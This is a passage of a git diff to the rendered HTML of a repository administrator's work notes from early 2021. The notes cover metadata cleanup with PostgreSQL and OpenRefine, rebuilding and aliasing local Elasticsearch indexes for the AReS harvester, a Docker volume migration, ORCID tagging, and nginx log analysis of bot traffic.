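def has_empty_segment(log_line: str) -> bool:
    """Return True if the request path contains '//' (query string ignored)."""
    match = REQUEST_RE.search(log_line)
    if match is None:
        return False
    path = match.group("path").split("?", 1)[0]
    return "//" in path


lines = [
    '104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] "GET /rest/communities?limit=1000 HTTP/1.1" 200 188779 "https://cgspace.cgiar.org/rest /communities?limit=1000" "RTB website BOT"',
    '104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] "GET /rest/communities//communities HTTP/1.1" 404 714 "https://cgspace.cgiar.org/rest/communities//communities" "RTB website BOT"',
]
for line in lines:
    print(has_empty_segment(line), line.split('"')[1])
```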

                                                                                                                      2021-02-24

                                                                                                                      • Export a list of journals for Peter to look through:
                                                                                                                      -
                                                                                                                      localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.journal", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                      -COPY 3345
                                                                                                                      -
                                                                                                                        +
                                                                                                                        localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.journal", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                        +COPY 3345
                                                                                                                        +
                                                                                                                        • Start a fresh harvest on AReS because Udana mapped some items today and wants to include them in his report:
                                                                                                                        -
                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                        -# start indexing in AReS
                                                                                                                        -
                                                                                                                          +
                                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                          +# start indexing in AReS
                                                                                                                          +
                                                                                                                          • Also, I want to include the new series name/number cleanups so it’s not a total waste of time

                                                                                                                          2021-02-25

                                                                                                                          • Hmm the AReS harvest last night seems to have finished successfully, but the number of items is less than I was expecting:
                                                                                                                          -
                                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                          -{
                                                                                                                          -  "count" : 99546,
                                                                                                                          -  "_shards" : {
                                                                                                                          -    "total" : 1,
                                                                                                                          -    "successful" : 1,
                                                                                                                          -    "skipped" : 0,
                                                                                                                          -    "failed" : 0
                                                                                                                          -  }
                                                                                                                          -}
                                                                                                                          -
                                                                                                                            +
                                                                                                                            $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                            +{
                                                                                                                            +  "count" : 99546,
                                                                                                                            +  "_shards" : {
                                                                                                                            +    "total" : 1,
                                                                                                                            +    "successful" : 1,
                                                                                                                            +    "skipped" : 0,
                                                                                                                            +    "failed" : 0
                                                                                                                            +  }
                                                                                                                            +}
                                                                                                                            +
                                                                                                                            • The current items index has 101380 items… I wonder what happened
                                                                                                                              • I started a new indexing
                                                                                                                              • @@ -843,9 +843,9 @@ COPY 3345
                                                                                                                            -
                                                                                                                            value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,"")
                                                                                                                            -value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
                                                                                                                            -
                                                                                                                              +
                                                                                                                              value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,"")
                                                                                                                              +value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
                                                                                                                              +
                                                                                                                              • This value.partition was new to me… and it took me a bit of time to figure out whether I needed to escape the parentheses in the issue number or not (no) and how to reference a capture group with value.replace
                                                                                                                              • I tried to check the 1095 CIFOR records from last week for duplicates on DSpace Test, but the page says “Processing” and never loads
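For comparison, the two `value.partition` expressions above can be approximated in Python. This is a sketch, assuming the GREL `partition` call returns the matched "volume(issue)" fragment at index 1; the function name `split_volume_issue` and the sample string are made up for illustration.

```python
import re
from typing import Optional, Tuple

# Same pattern as in the GREL expressions: digits, then digits in parentheses.
VOLUME_ISSUE_RE = re.compile(r"[0-9]+\([0-9]+\)")


def split_volume_issue(value: str) -> Optional[Tuple[str, str]]:
    """Return (volume, issue) from a string such as 'Some Journal 12(3)'."""
    match = VOLUME_ISSUE_RE.search(value)
    if match is None:
        return None
    fragment = match.group(0)  # roughly value.partition(...)[1]
    volume = re.sub(r"\(.*\)", "", fragment)  # drop the parenthesised issue
    issue = re.sub(r"^\d+\((\d+)\)", r"\1", fragment)  # keep only capture group 1
    return volume, issue


print(split_volume_issue("Some Journal 12(3)"))
```

Python references the capture group as `\1` in the replacement, where the GREL expression uses `$1`.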
                                                                                                                                  @@ -857,27 +857,27 @@ value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1")
                                                                                                                                • Niroshini from IWMI is still having issues adding WLE subjects to items during the metadata review step in the workflow
                                                                                                                                • It seems the BatchEditConsumer log spam is gone since I applied Atmire’s patch
                                                                                                                                -
                                                                                                                                $ grep -c 'BatchEditConsumer should not have been given' dspace.log.2021-02-[12]*
                                                                                                                                -dspace.log.2021-02-10:5067
                                                                                                                                -dspace.log.2021-02-11:2647
                                                                                                                                -dspace.log.2021-02-12:4231
                                                                                                                                -dspace.log.2021-02-13:221
                                                                                                                                -dspace.log.2021-02-14:0
                                                                                                                                -dspace.log.2021-02-15:0
                                                                                                                                -dspace.log.2021-02-16:0
                                                                                                                                -dspace.log.2021-02-17:0
                                                                                                                                -dspace.log.2021-02-18:0
                                                                                                                                -dspace.log.2021-02-19:0
                                                                                                                                -dspace.log.2021-02-20:0
                                                                                                                                -dspace.log.2021-02-21:0
                                                                                                                                -dspace.log.2021-02-22:0
                                                                                                                                -dspace.log.2021-02-23:0
                                                                                                                                -dspace.log.2021-02-24:0
                                                                                                                                -dspace.log.2021-02-25:0
                                                                                                                                -dspace.log.2021-02-26:0
                                                                                                                                -dspace.log.2021-02-27:0
                                                                                                                                -dspace.log.2021-02-28:0
                                                                                                                                -
                                                                                                                                +
                                                                                                                                $ grep -c 'BatchEditConsumer should not have been given' dspace.log.2021-02-[12]*
                                                                                                                                +dspace.log.2021-02-10:5067
                                                                                                                                +dspace.log.2021-02-11:2647
                                                                                                                                +dspace.log.2021-02-12:4231
                                                                                                                                +dspace.log.2021-02-13:221
                                                                                                                                +dspace.log.2021-02-14:0
                                                                                                                                +dspace.log.2021-02-15:0
                                                                                                                                +dspace.log.2021-02-16:0
                                                                                                                                +dspace.log.2021-02-17:0
                                                                                                                                +dspace.log.2021-02-18:0
                                                                                                                                +dspace.log.2021-02-19:0
                                                                                                                                +dspace.log.2021-02-20:0
                                                                                                                                +dspace.log.2021-02-21:0
                                                                                                                                +dspace.log.2021-02-22:0
                                                                                                                                +dspace.log.2021-02-23:0
                                                                                                                                +dspace.log.2021-02-24:0
                                                                                                                                +dspace.log.2021-02-25:0
                                                                                                                                +dspace.log.2021-02-26:0
                                                                                                                                +dspace.log.2021-02-27:0
                                                                                                                                +dspace.log.2021-02-28:0
                                                                                                                                +
                                                                                                                                diff --git a/docs/2021-03/index.html b/docs/2021-03/index.html index 6b8b34152..82c2d96ac 100644 --- a/docs/2021-03/index.html +++ b/docs/2021-03/index.html @@ -34,7 +34,7 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst "/> - + @@ -163,19 +163,19 @@ Also, we found some issues building and running OpenRXV currently due to ecosyst
                                                                                                                                • I looked at the number of connections in PostgreSQL and it’s definitely high again:
                                                                                                                                -
                                                                                                                                $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                -1020
                                                                                                                                -
                                                                                                                                  +
                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                  +1020
                                                                                                                                  +
                                                                                                                                  • I reported it to Atmire on the same issue where we had been tracking this before
                                                                                                                                  • Abenet asked me to add a new ORCID for ILRI staff member Zoe Campbell
                                                                                                                                  • I added it to the controlled vocabulary and then tagged her existing items on CGSpace using my add-orcid-identifiers-csv.py script:
                                                                                                                                  -
                                                                                                                                  $ cat 2021-03-04-add-zoe-campbell-orcid.csv 
                                                                                                                                  -dc.contributor.author,cg.creator.identifier
                                                                                                                                  -"Campbell, Zoë","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                  -"Campbell, Zoe A.","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                  -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                  -
                                                                                                                                    +
                                                                                                                                    $ cat 2021-03-04-add-zoe-campbell-orcid.csv 
                                                                                                                                    +dc.contributor.author,cg.creator.identifier
                                                                                                                                    +"Campbell, Zoë","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                    +"Campbell, Zoe A.","Zoe Campbell: 0000-0002-4759-9976"
                                                                                                                                    +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                    +
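The CSV above maps each spelling of an author's name to a single identifier label. As a rough sketch of how such a file could be read and checked before tagging items (this is not the `add-orcid-identifiers-csv.py` script itself; `read_orcid_mappings` and `ORCID_RE` are hypothetical names used only for illustration):

```python
import csv
import io
import re

# ORCID iDs are four groups of four characters; the last one may be "X".
ORCID_RE = re.compile(r"\d{4}-\d{4}-\d{4}-\d{3}[\dX]")


def read_orcid_mappings(csv_text):
    """Return (author name, identifier label, ORCID iD) tuples from CSV text."""
    rows = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        label = row["cg.creator.identifier"]
        match = ORCID_RE.search(label)
        if match is None:
            raise ValueError(f"no ORCID iD found in {label!r}")
        rows.append((row["dc.contributor.author"], label, match.group(0)))
    return rows


# Same content as 2021-03-04-add-zoe-campbell-orcid.csv shown above.
SAMPLE = '''dc.contributor.author,cg.creator.identifier
"Campbell, Zoë","Zoe Campbell: 0000-0002-4759-9976"
"Campbell, Zoe A.","Zoe Campbell: 0000-0002-4759-9976"
'''

if __name__ == "__main__":
    for author, label, orcid in read_orcid_mappings(SAMPLE):
        print(f"{author} -> {orcid}")
```

Validating the identifier format up front means a typo in the CSV fails loudly instead of being written to item metadata.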
                                                                                                                                    • I still need to do cleanup on the journal articles metadata
                                                                                                                                      • Peter sent me some cleanups but I can’t use them in the search/replace format he gave
                                                                                                                                      • @@ -183,9 +183,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -
                                                                                                                                    -
                                                                                                                                    localhost/dspace63= > \COPY (SELECT dspace_object_id AS id, text_value as "cg.journal" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                                    -COPY 32087
                                                                                                                                    -
                                                                                                                                      +
                                                                                                                                      localhost/dspace63= > \COPY (SELECT dspace_object_id AS id, text_value as "cg.journal" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
                                                                                                                                      +COPY 32087
                                                                                                                                      +
                                                                                                                                      • I used OpenRefine to remove all journal values that didn’t contain one of these characters: ; ( )
                                                                                                                                        • Then I cloned the cg.journal field to cg.volume and cg.issue
                                                                                                                                        • @@ -193,10 +193,10 @@ COPY 32087
                                                                                                                                      -
                                                                                                                                      value.partition(';')[0].trim() # to get journal names
                                                                                                                                      -value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,"$1") # to get journal volumes
                                                                                                                                      -value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # to get journal issues
                                                                                                                                      -
                                                                                                                                        +
                                                                                                                                        value.partition(';')[0].trim() # to get journal names
                                                                                                                                        +value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,"$1") # to get journal volumes
                                                                                                                                        +value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # to get journal issues
                                                                                                                                        +
                                                                                                                                        • Then I uploaded the changes to CGSpace using dspace metadata-import
                                                                                                                                        • Margarita from CCAFS was asking about an error deleting some items that were showing up in Google and should have been private
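For reference, the three GREL expressions used above to split `cg.journal` can be approximated outside OpenRefine. The following is a minimal Python sketch, assuming values shaped like `Name; 12(3)`; the function name `split_journal` and the sample value are made up for illustration and are not from the original notes:

```python
import re

# First "digits(digits)" run in the value, e.g. "12(3)".
VOLUME_ISSUE_RE = re.compile(r"(\d+)\((\d+)\)")


def split_journal(value):
    """Split a combined journal string into (name, volume, issue)."""
    # Everything before the first ";" is treated as the journal name.
    name = value.partition(";")[0].strip()
    match = VOLUME_ISSUE_RE.search(value)
    # Like the GREL version, yield empty strings when nothing matches.
    volume, issue = (match.group(1), match.group(2)) if match else ("", "")
    return name, volume, issue


if __name__ == "__main__":
    print(split_journal("Journal of Examples; 12(3)"))
```

A single regular expression with two capture groups replaces the two separate `replace()` calls, so volume and issue always come from the same match.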
                                                                                                                                            @@ -233,14 +233,14 @@ value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,"$1") # t
                                                                                                                                            • I migrated the Docker bind mount for the AReS Elasticsearch container to a Docker volume:
                                                                                                                                            -
                                                                                                                                            $ docker-compose -f docker/docker-compose.yml down
                                                                                                                                            -$ docker volume create docker_esData_7
                                                                                                                                            -$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
                                                                                                                                            -$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
                                                                                                                                            -$ docker rm es_dummy
                                                                                                                                            -# edit docker/docker-compose.yml to switch from bind mount to volume
                                                                                                                                            -$ docker-compose -f docker/docker-compose.yml up -d
                                                                                                                                            -
                                                                                                                                              +
                                                                                                                                              $ docker-compose -f docker/docker-compose.yml down
                                                                                                                                              +$ docker volume create docker_esData_7
                                                                                                                                              +$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
                                                                                                                                              +$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
                                                                                                                                              +$ docker rm es_dummy
                                                                                                                                              +# edit docker/docker-compose.yml to switch from bind mount to volume
                                                                                                                                              +$ docker-compose -f docker/docker-compose.yml up -d
                                                                                                                                              +
                                                                                                                                              • The trick is that when you create a volume like “myvolume” from a docker-compose.yml file, Docker will create it with the name “docker_myvolume”
                                                                                                                                                • If you create it manually on the command line with docker volume create myvolume then the name is literally “myvolume”
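The naming difference comes from Compose prefixing volume names with the project name, which by default is the name of the directory containing the compose file (here `docker`). A small sketch of that rule, assuming default naming (no explicit `name:` or `external: true` on the volume) and a project directory name that needs no normalization; `compose_volume_name` is a hypothetical helper, not part of Docker:

```python
from pathlib import PurePosixPath


def compose_volume_name(compose_file, volume, project_name=None):
    """Name Compose would give a volume declared in compose_file.

    Assumes default naming and a compose_file path that includes its
    directory, e.g. "docker/docker-compose.yml".
    """
    if project_name is None:
        # Default project name: the directory holding the compose file.
        project_name = PurePosixPath(compose_file).parent.name
    return f"{project_name}_{volume}"


if __name__ == "__main__":
    print(compose_volume_name("docker/docker-compose.yml", "esData_7"))
```

This is why the volume had to be created manually as `docker_esData_7` for Compose to pick it up later.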
                                                                                                                                                • @@ -249,39 +249,39 @@ $ docker-compose -f docker/docker-compose.yml up -d
                                                                                                                                                • I still need to make the changes to git master and add these notes to the pull request so Moayad and others can benefit
                                                                                                                                                • Delete the openrxv-items-temp index to test a fresh harvesting:
                                                                                                                                                -
                                                                                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                -

                                                                                                                                                2021-03-05

                                                                                                                                                +
                                                                                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                +

                                                                                                                                                2021-03-05

                                                                                                                                                • Check the results of the AReS harvesting from last night:
                                                                                                                                                -
                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                -{
                                                                                                                                                -  "count" : 101761,
                                                                                                                                                -  "_shards" : {
                                                                                                                                                -    "total" : 1,
                                                                                                                                                -    "successful" : 1,
                                                                                                                                                -    "skipped" : 0,
                                                                                                                                                -    "failed" : 0
                                                                                                                                                -  }
                                                                                                                                                -}
                                                                                                                                                -
                                                                                                                                                  +
                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                  +{
                                                                                                                                                  +  "count" : 101761,
                                                                                                                                                  +  "_shards" : {
                                                                                                                                                  +    "total" : 1,
                                                                                                                                                  +    "successful" : 1,
                                                                                                                                                  +    "skipped" : 0,
                                                                                                                                                  +    "failed" : 0
                                                                                                                                                  +  }
                                                                                                                                                  +}
                                                                                                                                                  +
                                                                                                                                                  • Set the current items index to read only and make a backup:
                                                                                                                                                  -
                                                                                                                                                  $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                                                                  -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
                                                                                                                                                  -
                                                                                                                                                    +
                                                                                                                                                    $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                                                                                                    +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
                                                                                                                                                    +
                                                                                                                                                    • Delete the current items index and clone the temp one to it:
                                                                                                                                                    -
                                                                                                                                                    $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                    -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                    -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                                                                    -
                                                                                                                                                      +
                                                                                                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                      +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                      +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                                                                      +
                                                                                                                                                      • Then delete the temp and backup:
                                                                                                                                                      -
                                                                                                                                                      $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                      -{"acknowledged":true}%
                                                                                                                                                      -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-05'
                                                                                                                                                      -
                                                                                                                                                        +
                                                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                        +{"acknowledged":true}%
                                                                                                                                                        +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-05'
                                                                                                                                                        +
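The index swap above always follows the same order: block writes, clone to a backup, delete the live index, clone the temp index into its place, then clean up. As a sketch only, the sequence could be expressed as a plan of HTTP requests mirroring the curl commands; `swap_plan` and `run` are hypothetical names, and `run` assumes an Elasticsearch node that accepts unauthenticated requests at the given base URL:

```python
import json
import urllib.request


def swap_plan(base, live, temp, backup):
    """Return ordered (method, url, body) steps mirroring the curl commands."""
    block_writes = {"settings": {"index.blocks.write": True}}
    return [
        ("PUT", f"{base}/{live}/_settings", block_writes),  # make live read-only
        ("POST", f"{base}/{live}/_clone/{backup}", None),   # back it up
        ("DELETE", f"{base}/{live}", None),                 # drop live
        ("PUT", f"{base}/{temp}/_settings", block_writes),  # make temp read-only
        ("POST", f"{base}/{temp}/_clone/{live}", None),     # temp becomes live
        ("DELETE", f"{base}/{temp}", None),                 # clean up temp
        ("DELETE", f"{base}/{backup}", None),               # clean up backup
    ]


def run(plan):
    """Send each step in order; urlopen raises on any HTTP error status."""
    for method, url, body in plan:
        data = json.dumps(body).encode() if body is not None else None
        request = urllib.request.Request(url, data=data, method=method)
        if data is not None:
            request.add_header("Content-Type", "application/json")
        with urllib.request.urlopen(request) as response:
            print(method, url, response.status)


if __name__ == "__main__":
    # Only print the plan here; call run(plan) against a real node.
    for step in swap_plan("http://localhost:9200", "openrxv-items",
                          "openrxv-items-temp", "openrxv-items-2021-03-05"):
        print(step[0], step[1])
```

Keeping the plan separate from its execution makes it possible to review the exact requests before anything is deleted.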
                                                                                                                                                        -
                                                                                                                                                        $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                        -...
                                                                                                                                                        -    "openrxv-items-final": {
                                                                                                                                                        -        "aliases": {
                                                                                                                                                        -            "openrxv-items": {}
                                                                                                                                                        -        }
                                                                                                                                                        -    },
                                                                                                                                                        -
                                                                                                                                                          +
                                                                                                                                                          $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                          +...
                                                                                                                                                          +    "openrxv-items-final": {
                                                                                                                                                          +        "aliases": {
                                                                                                                                                          +            "openrxv-items": {}
                                                                                                                                                          +        }
                                                                                                                                                          +    },
                                                                                                                                                          +
                                                                                                                                                          • But on AReS production openrxv-items has somehow become a concrete index:
                                                                                                                                                          -
                                                                                                                                                          $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                          -...
                                                                                                                                                          -    "openrxv-items": {
                                                                                                                                                          -        "aliases": {}
                                                                                                                                                          -    },
                                                                                                                                                          -    "openrxv-items-final": {
                                                                                                                                                          -        "aliases": {}
                                                                                                                                                          -    },
                                                                                                                                                          -    "openrxv-items-temp": {
                                                                                                                                                          -        "aliases": {}
                                                                                                                                                          -    },
                                                                                                                                                          -
                                                                                                                                                            +
                                                                                                                                                            $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
                                                                                                                                                            +...
                                                                                                                                                            +    "openrxv-items": {
                                                                                                                                                            +        "aliases": {}
                                                                                                                                                            +    },
                                                                                                                                                            +    "openrxv-items-final": {
                                                                                                                                                            +        "aliases": {}
                                                                                                                                                            +    },
                                                                                                                                                            +    "openrxv-items-temp": {
                                                                                                                                                            +        "aliases": {}
                                                                                                                                                            +    },
                                                                                                                                                            +
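The difference between the two `_alias` responses above (an alias pointing at `openrxv-items-final` versus three concrete indexes with no aliases) can be checked programmatically. The following is a minimal sketch, assuming the JSON has already been fetched and parsed; the function names `classify_indexes` and `is_alias` are hypothetical and not part of OpenRXV or Elasticsearch.

```python
import json


def classify_indexes(alias_response):
    """Return (alias -> list of backing indexes, sorted list of indexes with no aliases)."""
    alias_targets = {}
    unaliased = []
    for index_name, info in alias_response.items():
        aliases = info.get("aliases", {})
        if not aliases:
            unaliased.append(index_name)
        for alias_name in aliases:
            alias_targets.setdefault(alias_name, []).append(index_name)
    return alias_targets, sorted(unaliased)


def is_alias(alias_response, name):
    """True if `name` appears only as an alias and not as a top-level (concrete) index."""
    alias_targets, _ = classify_indexes(alias_response)
    return name in alias_targets and name not in alias_response


# The two responses shown above, trimmed to the relevant keys.
healthy = json.loads('{"openrxv-items-final": {"aliases": {"openrxv-items": {}}}}')
broken = json.loads(
    '{"openrxv-items": {"aliases": {}},'
    ' "openrxv-items-final": {"aliases": {}},'
    ' "openrxv-items-temp": {"aliases": {}}}'
)

healthy_ok = is_alias(healthy, "openrxv-items")
broken_ok = is_alias(broken, "openrxv-items")
```

With the first response `openrxv-items` is reported as an alias; with the production response it is not, because it shows up as a top-level index name.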
                                                                                                                                                            • I fixed the issue on production by cloning the openrxv-items index to openrxv-items-final, deleting openrxv-items, and then re-creating it as an alias:
                                                                                                                                                            -
                                                                                                                                                            $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
                                                                                                                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
                                                                                                                                                            -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                            -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                            -
                                                                                                                                                              +
                                                                                                                                                              $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
                                                                                                                                                              +$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
                                                                                                                                                              +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                                                                              +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                              +
                                                                                                                                                              • Delete backups and remove read-only mode on openrxv-items:
                                                                                                                                                              -
                                                                                                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-07'
                                                                                                                                                              -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                              -
                                                                                                                                                                +
                                                                                                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-03-07'
                                                                                                                                                                +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                +
                                                                                                                                                                • Linode sent alerts about the CPU usage on CGSpace yesterday and the day before
                                                                                                                                                                  • Looking in the logs I see a few IPs making heavy use of the REST API and XMLUI:
                                                                                                                                                                -
                                                                                                                                                                # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '0[56]/Mar/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                -
                                                                                                                                                                  +
                                                                                                                                                                  # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '0[56]/Mar/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                  +
                                                                                                                                                                  • I see the usual IPs for the CCAFS and ILRI importer bots, but also 143.233.242.132, which appears to belong to GARDIAN:
                                                                                                                                                                  -
                                                                                                                                                                  # zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c Delphi
                                                                                                                                                                  -6237
                                                                                                                                                                  -# zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c -v Delphi
                                                                                                                                                                  -6418
                                                                                                                                                                  -
                                                                                                                                                                    +
                                                                                                                                                                    # zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c Delphi
                                                                                                                                                                    +6237
                                                                                                                                                                    +# zgrep '143.233.242.132' /var/log/nginx/access.log.1 | grep -c -v Delphi
                                                                                                                                                                    +6418
                                                                                                                                                                    +
                                                                                                                                                                    • They seem to make requests twice, once with the Delphi user agent that we know and already mark as a bot, and once with a “normal” user agent
                                                                                                                                                                      • Looking in Solr I see they have been using this IP for a while, as they have 100,000 hits going back into 2020
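The two `zgrep | grep -c` counts above split one client's requests by whether the user agent contains "Delphi". A rough Python equivalent is sketched below, assuming nginx's combined log format; the function name and the sample lines are hypothetical and not taken from the real access log. Unlike the `zgrep` pattern, it matches the IP only in the client address field.

```python
def split_hits_by_agent(lines, ip, agent_substring):
    """Return (hits whose user agent contains agent_substring, all other hits) for one client IP."""
    with_agent = 0
    without_agent = 0
    for line in lines:
        # In the combined log format the client address is the first field.
        if line.split(" ", 1)[0] != ip:
            continue
        # The user agent is the last double-quoted field on the line.
        parts = line.rstrip().rsplit('"', 2)
        user_agent = parts[1] if len(parts) == 3 else ""
        if agent_substring in user_agent:
            with_agent += 1
        else:
            without_agent += 1
    return with_agent, without_agent


# Hypothetical sample lines for illustration only.
sample = [
    '143.233.242.132 - - [05/Mar/2021:10:00:00 +0100] "GET /rest/items HTTP/1.1" 200 512 "-" "Delphi 2009"',
    '143.233.242.132 - - [05/Mar/2021:10:00:01 +0100] "GET /rest/items HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [05/Mar/2021:10:00:02 +0100] "GET / HTTP/1.1" 200 128 "-" "Delphi 2009"',
]
result = split_hits_by_agent(sample, "143.233.242.132", "Delphi")
```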
                                                                                                                                                                      • @@ -375,9 +375,9 @@ $ curl -X PUT "localhost:9200/openrxv-items/_set
                                                                                                                                                                    -
                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                    -13
                                                                                                                                                                    -
                                                                                                                                                                      +
                                                                                                                                                                      $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                      +13
                                                                                                                                                                      +
                                                                                                                                                                      • On 2021-03-03 the PostgreSQL transactions started rising:

                                                                                                                                                                      PostgreSQL query length week

                                                                                                                                                                      @@ -409,10 +409,10 @@ $ curl -X PUT "localhost:9200/openrxv-items/_set
                                                                                                                                                                  -
